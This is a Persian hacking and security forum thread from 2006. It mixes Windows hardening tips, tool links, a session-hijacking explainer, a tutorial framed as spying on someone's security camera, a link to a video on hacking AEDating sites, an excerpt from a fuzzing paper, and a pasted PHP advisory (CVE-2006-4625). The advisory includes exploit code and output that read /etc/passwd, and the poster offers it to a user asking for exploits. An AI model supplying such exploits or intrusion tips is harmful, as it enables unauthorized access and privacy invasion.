یک ابزار قدرتمند برای برقرار کردن سیستم رمز نگاری در ارسال و دریافت ها و البته فشرده سازی برای tcp/ip و udp . این ابزار تحت پلت فورم Linux قابل اجرا است و تحت پروانه GUN میباشد .




Download : click (http://www.l0t3k.net/tools/Tunneling/zebedee-2.5.3.tar.gz)

VH-1
02-10-2006, 02:26
دوست عزیز کارت حرف نداره ادامه بده عالیه اگه تونستی ترفندهای ویندوز رو هم تو یه پک برامون بذار و تغییر رنگ در داس یادم رفته اونم برام بذار
بینهایت ممنون

VH-1
02-10-2006, 02:29
Pastoo عزیزم اگه برات ممکن باشه سری آموزشی مکینتاش رو بذار
یه دنیا ممنون

pastoo
02-10-2006, 03:21
دوست عزیز کارت حرف نداره ادامه بده عالیه اگه تونستی ترفندهای ویندوز رو هم تو یه پک برامون بذار و تغییر رنگ در داس یادم رفته اونم برام بذار
بینهایت ممنون


جاش اینجا نیست ولی اینو داشته باش

http://rapidshare.de/files/35158098/xph1.pdf (http://rapidshare.de/files/35158098/xph1.pdf)

pastoo
02-10-2006, 23:51
فیلم آموزشی هک سایت هایی که از پرتال AEDating استفاده می کنن ( جدید )


New Download (http://nimajinx-sari.persiangig.com/AD....NIMANIMA.rar)

pastoo
04-10-2006, 01:08
BufferShield یک ابزار امنیتی برای خانواده Windows می باشد که از هک شدن آنها توسط حملات Buffer overflows جلوگیری می کند . هم چنین جلوی بسیاری از حملات را نیز می گیرد .

همان گونه که خودتان می دانید حملات Buffer overflows به هکرها و ویروس نویسان این امکان را می دهد که malicious code های خود را بر روی سیستم شما اجرا کنند ، پس همان گونه که خود می دانید دفاع در برابر این گونه حملات جزو واجبات است .

نسخه تجاری این نرم افزار تنها برای سیستم عامل های Microsoft موجود می باشد که در آن می توانید مشخص کند که کدام برنامه محافظت بشود و یا کدام برنامه محافظت نشود . هم چنین این نرم افزار امکان استثناء قرار دادن قسمتی از حافظه که برنامه های آن قسمت باید اجرا شوند را دارد و این در بعضی از مواقع ضروری است زیرا بعضی از برنامه ها dynamic code خود را در stack و یا heap بوجود می آورند و بعد از آن سعی در اجرای ان می کنند.



خصوصیات :

· کشف کدهای اجرایی در stack ، heap پیش فرض ، dynamic heap ، virtual memory و data segment

· درصورت کشف Buffer overflows توانایی از بین بردن برنامه در حال اجرا را دارد

· توانایی انتقال گزارش به event log ویندوز در صورت کشف overflows

http://www.sys-manage.com/downloadableItems/applications/BuffShld/BuffShld.exe (http://www.sys-manage.com/downloadableItems/applications/BuffShld/BuffShld.exe)</SPAN>

با تشکر از simorgh

pastoo
04-10-2006, 01:32
DoS یکی از معمول ترین حملات برای از کار انداختن یک سیستم یا حداقل تاثیر گذاری روی بازدهی اون سیستم هست. کامپیوتر هایی که پشت یک فایروال هستن عموما در برابر این حملات محافظت میشوند ولی کامپیوتر هایی که مستقیما به اینترنت متصل میشوند تقریبا تمثیل گوشت قربانی هستند !!

راه حل
یک سری راهکارهایی در رجیستری هست که میتونید به کامپیوتر ویندوز 2000 اعمال کنید تا تقریبا و تا حدود زیادی این حملات رو بی اثر کنید. تمام آپشن های زیر مقادیر DWORD هستند که در قسمت زیر میتونید پیداشون کنین :


HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip
\Parameters


· SynAttackProtect : این قسمت در برابر حمله SYN flood شما رو بیمه میکنه. اگر به مقدار 0 یا 1 یا 2 تنظیم بشه در حقیقت شما Security Level رو تنظیم کردین. بال بردن مقدار تاخیر بیشتری رو در ارتباطات اینترنت ایجاد میکنه چرا که در اتصالات TCP .. تایم اوت ایجاد میکنه.
· EnableDeadGWDetect : اگر به 0 ست شود از سوییچ شدن کامپیوتر به یک دروازه دیگه جلوگیری میکنه که این مسئله از شناسنامه های حملات DoS بحساب میاد. مقدار 1 اجازه سوییچ شدن رو میده.
· EnablePMTUDiscovery: ست شدن به 0 برای جلوگیری از شکستن استک TCP توسط هکر هست که از ردیابی MTU در ویندوز استفاده میکنه. مقدار 1 تغییرات MTU رو آزاد میذاره. (درباره MTU در ویندوز بیشتر توضیح میدم)
· KeepAliveTime: این مقدار رو باید هر چی کمتر بدید (بر مبنای واحد میلی ثانیه) که زمان فرستادن بسته های Keep-Alive توسط ویندوز بیشتر بشه تا سیستم سریعتر ارتباطات اطراف خودشو آپدیت کنه و زودتر بفهمه که آیا ارتباط با کامپیوتر راه دور هنوز برقرار هست یا نه . خود مایکروسافت میگه بذارید روی 300000 (در حقیقت 5 دقیقه).

pastoo
04-10-2006, 01:38
Session Hijacking :

اگر بخواهم ترجمه فارسی آن را بنویسم باید بگویم " دزدی جلسه " همانگونه که از ترجمه بنده درک کردید این در واقع یک دزدی است تا یک حمله !! در واقع این حمله ترکیبی ماهرانه از دو مدل حمله استراق سمع و دزدیدن IP است (IP Spoofing , Sniffing) البته بنده به هیچ عنوان قسط کالبد شکافی این دو حمله را ندارم ولی در آینده توضیح خواهم داد ؛ بریم سر اصل مطلب خوب توجه کنید :

در نظر بگیرد من دارم با یک سرویس FTP(یا هر سرویس دیگری) فعل و انفعالاتی را انجام میدهم مثل تمام کارها برای این کار باید احراز هویت بشوم ( منظورم USER و PASS است ) . حال اگر کاربری مثل شما !! خودش را یک باره به جای من جا بزند و ادامه کار من را انجام دهد یا کار مورد نظر خودش را با حق دسترسی من (هر اندازه ای که من مجوز دارم) چگونه است ؟ در واقع به این عمل دزدی جلسه (Session Hijacking) میگویند . این تشریحی ساده و عامیانه برای آشنای شما با اینگونه حملات است .

یک نکته مهم را ذکر کنم که جدیداً با آمدن ابزار های بسیار قوی همچون ... میتوان نشست را به گونه ای دزدید که دستورات شما بر روی سرور اجرا شود و حتما نیازی نیست که شما دارای مجوز لازم باشید (هر دو خانواده UNIX و WIN2K ها ) ، این هم بدیهی است که شما میتوانید به راحتی خود را جای سرور جا زده و حتما ارتباط طرف را قطع نکنید و به استراق سمع بپردازید و دستورات مورد علاقه خود را روی کلاینت اجرا کنید . اگر شما موفق به انجام این حمله شوید و اطلاعات مفیدی در باره انواع حملات (مخصوصا حمله به لایه های پایینی شبکه ) داشته باشید باید اشهد آن سرور را خفن ناک خواند !!

اگر بخواهیم چند ابزار به درد بخور را برای اینگونه حملات معرفی کنم میتوانم به ابزارهای Hunt و Dsniff و Session Hijacking و Juggernaut و IP Watcher و TTY Watcher و TTY Snoop اشاره کرد فکر میکنم بستان باشد !!

نکته : آقایان به شدت دقت کنید چون اگر به جای خفنی بزنید و بی تجربه باشید و درست ابزار ها را پیکر بندی نکنید یک طوفان ACK راه میاندازید ( یا اگر از Juggernaut و یا IP Watcher استفاده کنید ) که زود ..... البته خود این طوفان ACK یک نوع حمله DOS است (نه DDOS) که باید در مجال دیگری دوستان به ان بپردازند !!

امیر آشتیانی

pastoo
04-10-2006, 01:46
سه شنبه 1 دي 1383 http://weblog.websecurity.ir/images/arrow.gif
http://www.thaifast.com/Microsoft_Books/images/607532f.jpgخيلي از افرادي كه در زمينه امنيت فعاليت مي كنند ، احتمالا كدهايي را ديده اند كه به عنوان يك Exploit شناخته شده اند. اين Exploit ها كه اغلب به زبان C نوشته شده اند امكان سوء استفاده از آسيب پذيري ها را به وجود مي آورند.
من اينجا قصد ندارم كه درباره نحوه پيدا كردن اين اكسپلويت ها صحبت كنم ولي قصد دارم يك سري فايل PDF آموزشي را اينجا قرار بدهم تا كساني كه دوست دارند در زمينه برنامه نويسي زبان قدرتمند C برنامه نويسي كنند از آنها استفاده كنند. اين فايل هاي آموزشي براي كساني نوشته شده است كه دوست دارند اينگونه برنامه ها را بنويسند و يك منبع بسيار ساده و عالي براي كساني مي باشد كه مي خواهند از ابتدا اين راه را بپيمايند. در اين فايل هاي آموزش، از ابتداي زيان برنامه نويسي، آسمبلي و در انتهاي آن برنامه نويسي سوكت( كه يادگيري آن براي نوشتن Exploit ها ضرورت دارد) بيان شده است.


Programming for Hackers (http://www.hardcoreindustries.net/download/dl_file.php?id=131)
Programming for Hackers - Part II (http://www.hardcoreindustries.net/download/dl_file.php?id=132)
Programming for Hackers - Part III (http://www.hardcoreindustries.net/download/dl_file.php?id=133)
Programming for Hackers - Part IV (http://www.hardcoreindustries.net/download/dl_file.php?id=134)
Programming for Hackers - Part V (http://www.hardcoreindustries.net/download/dl_file.php?id=135)
Programming for Hackers - Part VI (http://www.hardcoreindustries.net/download/dl_file.php?id=136)
Programming for Hackers - Part VII (http://www.hardcoreindustries.net/download/dl_file.php?id=137)

pastoo
04-10-2006, 01:56
واقعاً دلم نمی خواست یاد بدم چه جوری با این شیوه میشود کار کرد !! اگر کل شبکه اینترنت را بگردید الان هم در هیچ وبلاگ فارسی یا سایت فارسی بعد از گذشت 80 روز اندی هنوز هیچ راهنما یا مطلبی که به نوعی کامل کننده آن باشد وجود ندارد ، در اکثر سایت های انگلیسی زبان هم که به موضوع امنیت میپردازند هیچ بحثی در استفاده از این متد نشده و .... ولی به هر حال تصمیم گرفتم تا حدودی شما ها را راهنمایی کنم تا اگر بعدا ها ....

خوب ما مثلا فرض میکنیم میخواهیم به یک دوربین فیلم برداری امنیتی دسترسی پیدا کنیم و ببینیم آن چی نشان میدهد که بهش میگویند امنیتی !! ( علت آن به خودمان مربوطه ، مثلا فضولی !!) IP ماشین سرویس دهنده و کنترل کننده آن فرضاً 65.32.124.32 است اما ما میدانیم که این یک IP ثابت نیست و مثلا دقایقی (مثلا فواصل زمانی چند ساعته) بعد IP آن به 65.32.124.35 تغییر پیدا میکند ، ( این تغییر برای ما غیر مشخص است اما برای راهبر ان کاملا مشخص است و آن کاملا مطلع است ) خوب اگر این اتفاق برای ما بی افتد که معلوم چه میشود !! اینجا بود که من راه حل Dynamic DNS (http://blog.websecurity.ir/news_item.asp?NewsID=298) را جلوی پای شما گذاشتم . این سرویس (DNS دینامیک ) به صورت یک نشانی IP شبه استاتیک ( ثابت ) عمل میکند . در این سرویس شما میتوانید با انتخاب نام یک میزبان دلخواه مثلا zxo003.dnsservice.org را انتخاب نمایید که شما را به نشانی IP عمومی تان می برد ، حتی اگر تغییر کند . از این دست سرویس دهنده ها بسیار هستند اما من در اینجا آموزش کار کردن با dyndns.org (http://www.dyndns.org/) را به شما آموزش میدهم و بقیه ماجرا را با این سایت ادامه میدهیم !! اول از همه یک حساب رایگان (http://www.dyndns.com/account/create.html) یا پولی ایجاد میکنیم ، بعد از فعال سازی این حساب روی دکمه Services (http://www.dyndns.com/services/) در بالای صفحه کلید میکنید !! بعد بر روی Dynamic DNS (http://www.dyndns.com/services/dns/dyndns/) کلید میکنید !! و حال بر روی Add Host کید میکنید و نام میزبان اول خودتان را مشخص میکنید ( برای توضیحات بیشتر به راهنما های موجود در خودش رجوع کنید !!) . در این هنگامه مثلا سایت خیر سرش IP ماشین که شما با ان به سایت وصل شدید را به شما نمایش میدهد ، توجه کنید این IP باید IP خود دوربین یا IP ماشین میزبان آن و سرویس دهنده آن باشد نه آدرس ماشین حمله کننده پس اگر درست نیست اصلاح کنید !! حال Enable Wildcard را فعال کنید (تیک آن را بزنید) و دکمه add Host را بزنید (یعنی روی آن کلید کنید !! ) . حال چون سوژه ما یک دوربین فرضاً DCS-900W محصول D-Link است روی مسیر یاب و یا روتر شبکه دو پورت باز میکنیم ( اگر بلد نیستید بروید و بمی... ) و دوباره به dyndns.org (http://www.dyndns.org/) باز میگردیم . حال وارد سایت میشویم و بر روی Services (http://www.dyndns.com/services/) دوباره کلید میکنیم و بعد از ان بر روی WebHop (http://www.dyndns.com/services/webredirect/webhop/) در انتهای صفحه کلید میکنید و در صفحه جدید بر روی Add WebHop (http://www.dyndns.com/account/services/hosts/webhop/add.html) کلید کنید و بعد از آن در صفحه باز شده یک نام میزبان دیگر را انتخاب کنید و از منو یک domain name دیگر را انتخاب کنید . (domain name نام میزبانی است که برای دستیابی دوربین استفاده خواهید کرد ) در کادر Redirect URL نام کامل دامنه اولی را که تایپ کردید در اینجا وارد میکنید و در آخر هم شماره پورت را وارد میکنید که باید یک پورت باشد که شرایط امنیتی مورد نظر شما را هم در آن لحاظ شده باشد و ... ( مثلا zxo003.ath.cx:80 ) . خوب حال با کلید بر روی دکمه Add Redirection کار تمام است ! وقتی این دو نام میزبان را اضافه کردید به راحتی میتوانید با تایپ نشانی دوم در یک مرورگر وب به تصویر مورد نظر دسترسی داشته باشید حال میخواهد هر چه قدر هم که IP آن عوض بشود شما به هدف میرسید و ......



موفق پیروز باشید.

کاری بسیار جالب از امیر آشتیانی عزیز

AliR3za
06-10-2006, 21:18
salam
من هسوال داشتم ایا برای php ورژن 5 و فکرکنم 5.8 باگی پیدا شده من تو سایت securityfocus سرچ زدم دو تا چیر داد که من سر در نیاوردم حالا میخاستم بدونمشما که خبره و کار امنیت هستین برای این برنامه باگی هست اگه هست میشه لطفاً اموزش و اکسپلویتش رو بذارین؟
چاکر شما شفته

pastoo
06-10-2006, 23:53
salam
من هسوال داشتم ایا برای php ورژن 5 و فکرکنم 5.8 باگی پیدا شده من تو سایت securityfocus سرچ زدم دو تا چیر داد که من سر در نیاوردم حالا میخاستم بدونمشما که خبره و کار امنیت هستین برای این برنامه باگی هست اگه هست میشه لطفاً اموزش و اکسپلویتش رو بذارین؟
چاکر شما شفته


امیدوارم چندتا چیزو بدونی

1) اگه باگی پیدا کردی ابتدا باید آن را explit کنی که روش explit رو توضیح دادم
2) در سایتهای امنیتی که می گردی یا بهت باگ را میده یا کسی میاد explit آن باگ را در سایت برا دانلود قرار میده

حالا اگر سیستم خاصی مد نظر داری باید در سایت های امنیتی دنبال باگ آن سیستم بگردی و آن ها را دریافت کنی و استفاده کنی راجع به PHP VER 5 که گفتی باگ زیاده که من 1 کیشو اینجا برات میزارم که خودت بیا explit کن

Hash: SHA1

[PHP 5.1.6 / 4.4.4 Critical php_admin* bypass by ini_restore()]

Author: Maksymilian Arciemowicz (cXIb8O3)

Date:

- - Written: 05.09.2006

- - Public: 09.09.2006

SecurityAlert Id: 42

CVE: CVE-2006-4625

SecurityRisk: High

Affected Software: PHP 5.1.6 / 4.4.4 < = x

Advisory URL: http://securityreason.com/achievement_securityalert/42

Vendor: http://www.php.net

- --- 0.Description ---

PHP is an HTML-embedded scripting language. Much of its syntax is borrowed from C, Java and Perl with a couple of unique PHP-specific

features thrown in. The goal of the language is to allow web developers to write dynamically generated pages quickly.

A nice introduction to PHP by Stig Sæther Bakken can be found at http://www.zend.com/zend/art/intro.php on the Zend website. Also, much

of the PHP Conference Material is freely available.

php_admin_value name value

Sets the value of the specified directive. This can not be used in .htaccess files. Any directive type set with php_admin_value can

not be overridden by .htaccess or virtualhost directives. To clear a previously set value use none as the value.

php_admin_flag name on|off

Used to set a boolean configuration directive. This can not be used in .htaccess files. Any directive type set with php_admin_flag

can not be overridden by .htaccess or virtualhost directives.

http://pl.php.net/manual/en/configuration.changes.php

- --- 1. php_admin_value and php_admin_flag Bypass ---

When using PHP as an Apache module, you can also change the configuration settings using directives in Apache configuration files (e.g.

httpd.conf). This options are using by a lot of ISP to set open_basedir, safe_mode and more options.

For example:

open_basedir in httpd.conf

- ---

<Directory /usr/home/frajer/public_html/>

Options FollowSymLinks MultiViews Indexes

AllowOverride None

php_admin_flag safe_mode 1

php_admin_value open_basedir /usr/home/frajer/public_html/

</Directory>

- ---

In PHP are two config options. Are Local Value and Master Value. More in phpinfo() or ini_get()

Example:

If you have safe_mode or open_basedir (etc) set in Local Value for selected users and in Master Value is default value, you can restore

Master Value to Local Value per ini_restore() function!

- ---

ini_restore

(PHP 4, PHP 5)

ini_restore -- Restores the value of a configuration option

- ---

Restores the value of a php.ini file. Then your PHP options from httpd.conf are bypassed.

EXPLOIT:

- ---

<?

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

ini_restore("safe_mode");

ini_restore("open_basedir");

echo ini_get("safe_mode");

echo ini_get("open_basedir");

include("/etc/passwd");

?>

- ---

RESULT OF EXPLOIT:

- ---

1

/usr/home/frajer/public_html/

Warning: include() [function.include]: open_basedir restriction in effect. File(/etc/passwd) is not within the allowed path(s):

(/usr/home/frajer/public_html/) in /usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include(/etc/passwd) [function.include]: failed to open stream: Operation not permitted in

/usr/home/frajer/public_html/ini_restore.php on line 4

Warning: include() [function.include]: Failed opening '/etc/passwd' for inclusion (include_path='.:') in

/usr/home/frajer/public_html/ini_restore.php on line 4

# $BSD: src/etc/master.passwd,v 1.40 2005/06/06 20:19:56 brooks Exp $ # root:*:0:0:Charlie &:/root:/bin/csh toor:*:0:0:Bourne-ag.....

- ---

This issue is very dangerous, because Admin can't correct set open_basedir or safe_mode for all users

pastoo
09-10-2006, 16:16
اين مجموعه شامل دو سري مقالات فارسي به شرح زير است :
1- مديريت و امنيت
اين مقاله (كتاب 152 صفحه اي ) توسط آقاي :
دكتر حميد رضا شهرياري
ترجمه شده .

اين كتاب توسط طرح ملي نرم افزار باز (منتشر شده ) است و فصول آن به ترتيب :

1- مقدمه و آغاز به كار Apache
2 - پيكر بندي آپاچي - گامهاي اوليه
3- پيش به سوي يك سرويس وب واقعي
4- ميزباني مجازي virtual host
5- احراز هويت
6 - شاخص گزاري
7- تغيير مسير redirect
8- امنيت
9- PHP
10- CGI - Perl
11- ماژول ها modules در آپاچي


2- امنيت از متوسط تا حرفه اي (امنيت mod ها و معرفي آنها )
در اين مقاله كه از آقاي : افشين لامعي
در 31 صفحه تهيه گرديده ، به بررسي ماژول هاي امنيتي apache پرداخته و تنظيمات آنها را مورد بحث قرار ميدهد ، در قسمت بعد هم وارد مباحث حملات به apache شده و انواع حملات را شرح ميدهد ، و شايد شرح اين حملات براي پربارتر كردن اين مقاله اثر زيادي داشته .





http://www.simorgh-ev.com/security/modules/mysections/visit.php?lid=11

Arminsat
09-10-2006, 23:23
دوستان عزيز اگر كسي جواب سئوال مرا ميداند لطف مرا راهنمايي كند
ويندوز ويا سيستم عامل هاي ديگر چه مقدار فايل را در خود جا دهند

Arminsat
09-10-2006, 23:29
دوستان عزيز اگر كسي جواب سئوال مرا ميداند لطف مرا راهنمايي كند
ويندوز ويا سيستم عامل هاي ديگر چه مقدار فايل را ميتوانند در ون يك فولدر جا دهند

trinity
09-10-2006, 23:34
سلام http://us.i1.yimg.com/us.yimg.com/i/mesg/emoticons7/1.gif
میشه سئوالتون رو واضح تر بیان کنید ؟

pastoo
10-10-2006, 00:11
دوستان لطف کنن سوالات خود را در بخش مربوطه بکنن

ممنون

IKCO.DIAG
11-10-2006, 23:18
باسلام خدمت همه. چرا در لینوکس فدورا ورژن 3 هرکاری میکنم Cdهای صوتی وتصویریم را پخش نمی کند در ضمن من در این سیستم مبتدی هستم لطف کنید مرا راهنمایی کنید .
با تشکراز همه محمد

AliR3za
12-10-2006, 07:29
سلام
اول از همه اینکه من در این سایت نیتونم فارسی بنویسمو نیدونم چرا ولی در سایتهایدیگه میتونم فارس بنویسم الآن هم پستم رو در ورد نوشتم و کپی کردم تو سایت
خوب جناب هاتبارد من فکر کنم چون سی دیهای گرافیکو مالتی مدیا شما 32 بیت هستن ولی لینوک فدورا کور 64 بیته و شما باید به فرمانهای داس وارد باشی تا فکر کنم بتونی سی دی ها رو پخش کنی البته منم خودم در لینوکس دسته کمی از شما ندارم و این رو چون خودم هم قبلاً لینوکس رو نب کردم و بلد نبودم یه کسی به من این چنین گفت
خوب بریم سره سوال خودمون
جناب پست من اینترنتم مشگل داره و نیتونم آموزشهای اکسپلویت سازی رو دانلود کنم پ اگه امکان داره چد باک اکسپلویت شده رو برای من قرار دهید یا محل رو به من معرفی کنید که از این چیز های دراونجا باشه
چاکر شما شفته

pastoo
12-10-2006, 23:09
سلام
اول از همه اینکه من در این سایت نیتونم فارسی بنویسمو نیدونم چرا ولی در سایتهایدیگه میتونم فارس بنویسم الآن هم پستم رو در ورد نوشتم و کپی کردم تو سایت
خوب جناب هاتبارد من فکر کنم چون سی دیهای گرافیکو مالتی مدیا شما 32 بیت هستن ولی لینوک فدورا کور 64 بیته و شما باید به فرمانهای داس وارد باشی تا فکر کنم بتونی سی دی ها رو پخش کنی البته منم خودم در لینوکس دسته کمی از شما ندارم و این رو چون خودم هم قبلاً لینوکس رو نب کردم و بلد نبودم یه کسی به من این چنین گفت
خوب بریم سره سوال خودمون
جناب پست من اینترنتم مشگل داره و نیتونم آموزشهای اکسپلویت سازی رو دانلود کنم پ اگه امکان داره چد باک اکسپلویت شده رو برای من قرار دهید یا محل رو به من معرفی کنید که از این چیز های دراونجا باشه
چاکر شما شفته


دوست من از سرچ گوگل استفاده کن که بهترین معلم است

pastoo
12-10-2006, 23:19
استاد آراز صمدی دوست صمیمی و قدیمی من به دنیای security ,hack بازگشت
میشه گفت آراز اولین نفری بود که آموزش های کامل هک و امنیت را در ایران عرضه کرد و بیشتر این هکرهایی که میبینین مطالبشان را از این استاد عالی قدر شروع کردند و به پیشرفت در این زمینه رسیدن .
طبق صحبتی که با آراز کردم فعلا آموزش به زبان اصلی بوده ولی به زودی بلاگی فارسی ساخته خواهد شد

http://arazsamadi.blogspot.com/

pastoo
14-10-2006, 01:50
امروز می خوام 1 کی از حرفه ایی ترین مقالات روز دنیا را براتون بزارم

شما در این مقاله راه پیدا کردن باگ ها و آسیب پذیری های مختلف را در برنامه های کاربردی و سیستم عامل های حتی close source خواهید آموخت .پیشنهاد من این است دوستان سر فرصت این آموزش را خط به خط بخوانن و در عمل امتحان کنن . شما اگر این روش را یاد بگیرید و به کار بگیرید به زودی به 1 کی از بزرگترین متخصصان برنامه نویسی و امنیت در دنیای شبکه تبدیل خواهید شد .
این مقاله به صورت انگلیسی است و پیشنهاد خودم خواندن همین مطلب است ولی اگر دوستان وقت دارن این مقاله رو ترجمه کرده و در سایت قرار دهند کمک بزرگی در پیشرفت خود و دوستانشان انجام داده اند .






The Evolving Art of Fuzzing
By: Jared DeMott
1. Introduction


Fuzzing is a testing technique used to find bugs in software [26]. Often these bugs are security related since fuzzing is performed against the external or exposed interfaces of programs. Fuzzing is not used to establish completeness or correctness, the task of more traditional testing techniques. Instead, Fuzzing complements traditional testing to discover untested combinations of code and data by combining the power of randomness, protocol knowledge, and attack heuristics. Adding automatic protocol discovery, reading real-time tracer/debugger information, fault data logging, and multi-fuzzer sessions is the cutting edge in fuzzing tools.
Fuzzing is used by software companies and open source projects (e.g. Microsoft and Linux [2] [27] [29]) to improve the quality of their software, by vulnerability analysts to uncover and reports bugs (second party testing [3] [32] [28]), and by hackers to find and secretly exploit software [4]. Fuzzing is certainly not the only way these three parties explore the quality of software and there is plenty of debate about which methods are best. However, when compared with traditional software testing techniques or even source code audits and reverse engineering, fuzzing has been found effective and cost efficient [1].
Until recently, little was known about fuzzing; one company offers a fuzzing and reverse engineering class only to US government employees with a security clearance [6]. However, as fuzzing has matured, it has become an openly talked about and legitimate branch of software testing [1] [2]. There are even companies that produce and sell fuzzers, and that provide fuzzer development training as a sole or primary source of income [5] [6] [33] [40] [41]. This paper will explain the roots and current state of fuzzing, as well as discuss ongoing research and open questions.
2. Software Testing

a. Definition


The roots of fuzzing lie in testing. Software testing has been part of computing since the inception of computers and has been researched intensively. Software testing can be defined as:
“…the process used to help identify the correctness, completeness, security and quality of developed computer software.”[25]
However, there are limits to testing:
“…testing can never completely establish the correctness of arbitrary computer software. In computability theory, a field of computer science, an elegant mathematical proof concludes that it is impossible to solve the halting problem, the question of whether an arbitrary computer program will enter an infinite loop, or halt and produce output. In other words, testing is criticism or comparison that is comparing the actual value with expected one.” [25]
Later they expand their definition to include the open-ended nature of investigation which we will see relates to fuzzing:
“…effective testing of complex products is essentially a process of investigation, not merely a matter of creating and following rote procedure. … Although most of the intellectual processes of testing are nearly identical to that of review or inspection, the word testing is connoted to mean the dynamic analysis of the product—putting the product through its paces.” [25]

Along with another definition we see the need for automated tools to help enable human creativity.
“Software testing can be defined as a process of executing [symbolically or dynamically] a program with the intent of finding errors. A successful test is one which uncovers an as yet undiscovered error. Hence, testing should be done with well-planned test cases, which ensure execution of all possible basic paths in the program. This is a time consuming task; software testing tools that can reduce the testing time without reducing the thoroughness are very much valuable in this context.” [16]

It is clear that the ability to deliver quality software requires more than a quick “test before ship”. A development process, with quality as a priority from the beginning (bug prevention as well as discovery), is needed. This process is called formal methods in software engineering. Under the formal methods umbrella is software quality assurance. Under quality assurance we find software testing and its many branches [30].
b. Testing Types


Here are some of the testing techniques:
· “Black box testing - not based on any knowledge of internal design or code. Tests are based on requirements and functionality.
· White box testing - based on knowledge of the internal logic of an application's code. Tests are based on coverage of code statements, branches, paths, conditions.
· Unit testing - the most 'micro' scale of testing; to test particular functions or code modules. Typically done by the programmer and not by testers, as it requires detailed knowledge of the internal program design and code. Not always easily done unless the application has a well-designed architecture with tight code; may require developing test driver modules or test harnesses.
· Incremental integration testing - continuous testing of an application as new functionality is added; requires that various aspects of an application's functionality be independent enough to work separately before all parts of the program are completed, or that test drivers be developed as needed; done by programmers or by testers.
· Integration testing - testing of combined parts of an application to determine if they function together correctly. The 'parts' can be code modules, individual applications, client and server applications on a network, etc. This type of testing is especially relevant to client/server and distributed systems.
· Functional testing - black-box type testing geared to functional requirements of an application; this type of testing should be done by testers. This doesn't mean that the programmers shouldn't check that their code works before releasing it (which of course applies to any stage of testing.)
· System testing - black-box type testing that is based on overall requirements specifications; covers all combined parts of a system.
· End-to-end testing - similar to system testing; the 'macro' end of the test scale; involves testing of a complete application environment in a situation that mimics real-world use, such as interacting with a database, using network communications, or interacting with other hardware, applications, or systems if appropriate.
· Sanity testing or smoke testing - typically an initial testing effort to determine if a new software version is performing well enough to accept it for a major testing effort. For example, if the new software is crashing systems every 5 minutes, bogging down systems to a crawl, or corrupting databases, the software may not be in a 'sane' enough condition to warrant further testing in its current state.
· Regression testing - re-testing after fixes or modifications of the software or its environment. It can be difficult to determine how much re-testing is needed, especially near the end of the development cycle. Automated testing tools can be especially useful for this type of testing.
· Acceptance testing - final testing based on specifications of the end-user or customer, or based on use by end-users/customers over some limited period of time.
· Load testing - testing an application under heavy loads, such as testing of a web site under a range of loads to determine at what point the system's response time degrades or fails.
· Stress testing - term often used interchangeably with 'load' and 'performance' testing. Also used to describe such tests as system functional testing while under unusually heavy loads, heavy repetition of certain actions or inputs, input of large numerical values, large complex queries to a database system, etc. Stress testing might also include unexpected environmental conditions such as a shortage of processing, memory, or disk resources.
· Performance testing - term often used interchangeably with 'stress' and 'load' testing. Ideally 'performance' testing (and any other 'type' of testing) is defined in requirements documentation or QA or Test Plans.
· Usability testing - testing for 'user-friendliness'. Clearly this is subjective, and will depend on the targeted end-user or customer. User interviews, surveys, video recording of user sessions, and other techniques can be used. Programmers and testers are usually not appropriate as usability testers.
· Install/uninstall testing - testing of full, partial, or upgrade install/uninstall processes.
· Recovery testing - testing how well a system recovers from crashes, hardware failures, or other catastrophic problems.
· Failover testing - typically used interchangeably with 'recovery testing'
· Security testing - testing how well the system protects against unauthorized internal or external access, willful damage, etc; may require sophisticated testing techniques. A proper security analysis (not just running nessus) is still fairly rare.
· Compatibility testing - testing how well software performs in a particular hardware/software/operating system/network/etc. environment.
· Exploratory testing - often taken to mean a creative, informal software test that is not based on formal test plans or test cases; testers may be learning the software as they test it.
· Ad-hoc testing - similar to exploratory testing, but often taken to mean that the testers have significant understanding of the software before testing it.
· Context-driven testing - testing driven by an understanding of the environment, culture, and intended use of software. For example, the testing approach for life-critical medical equipment software would be completely different than that for a low-cost computer game.
· User acceptance testing - determining if software is satisfactory to an end-user or customer.
· Comparison testing - comparing software weaknesses and strengths to competing products.
· Alpha testing - testing of an application when development is nearing completion; minor design changes may still be made as a result of such testing. Typically done by end-users or others, not by programmers or testers.
· Beta testing - testing when development and testing are essentially completed and final bugs and problems need to be found before final release. Typically done by end-users or others, not by programmers or testers.
· Mutation testing - a method for determining if a set of test data or test cases is useful, by deliberately introducing various code changes ('bugs') and retesting with the original test data/cases to determine if the 'bugs' are detected. Proper implementation requires large computational resources.” [30]

Fuzzing is a semi-automated process (human interaction to determine best uses and results are currently needed) that combines many of the above techniques: functional, black box, exploratory, stress, and security testing. Codenomicon uses the term “negative testing” or “robustness testing” to refer to fuzzing. While there are many definitions/terms we’ll use the term fuzzing throughout this paper. The details of fuzzing will be examined in detail later in the paper.
Most companies know that producing and delivering patches to fix buggy software is more expensive than quality development from the beginning [27]. There are ratings (CMM levels) for how well a company creates software [23]. As with all such ratings the validity and practical meaning are constantly questioned [24]. Testing functionality and security is a very involved process. Some testers focus on ensuring all the code has been touched and works correctly, but omit security testing. That is why so many products are released with security vulnerabilities.
c. Better Development


Some companies, such as Microsoft, have developed their own formal and secure software development method (Security Development Lifecycle or SDL) for producing higher quality products [27]. Microsoft agrees that the cost-benefit ratio for adopting such a secure development process is favorable. In their development model we see many techniques such as secure design and implementation, multiple security testing techniques (including fuzzing), static analysis with source code auditing tools, and even manual security code reviews. This has sharply decreased the number of exploitable bugs externally reported in their products, but still bugs persist. 100% secure implementations are as impossible as 100% thorough testing. Even if all bugs currently know to be vulnerabilities could be removed, new classes of bugs may be discovered. However, it is clearly possible to do better. The quote below shows the current Microsoft stance on fuzzing:
“Heavy emphasis on fuzz testing is a relatively recent addition to the SDL, but results to date are very encouraging. Unlike the static code-scanning tools, fuzz-testing tools must be built (or at least configured) for each file format and/or network protocol to be tested; because of this, they are often able to find errors missed by static analysis tools. Threat models help product teams prioritize interfaces and formats for testing. The results of fuzz testing are not totally deterministic (the tools are run for a finite number of cycles and are not guaranteed to find every bug) but experience has shown that an affordable level of fuzz testing is likely to find "interesting" bugs that might otherwise be exploited as security vulnerabilities.” [27]

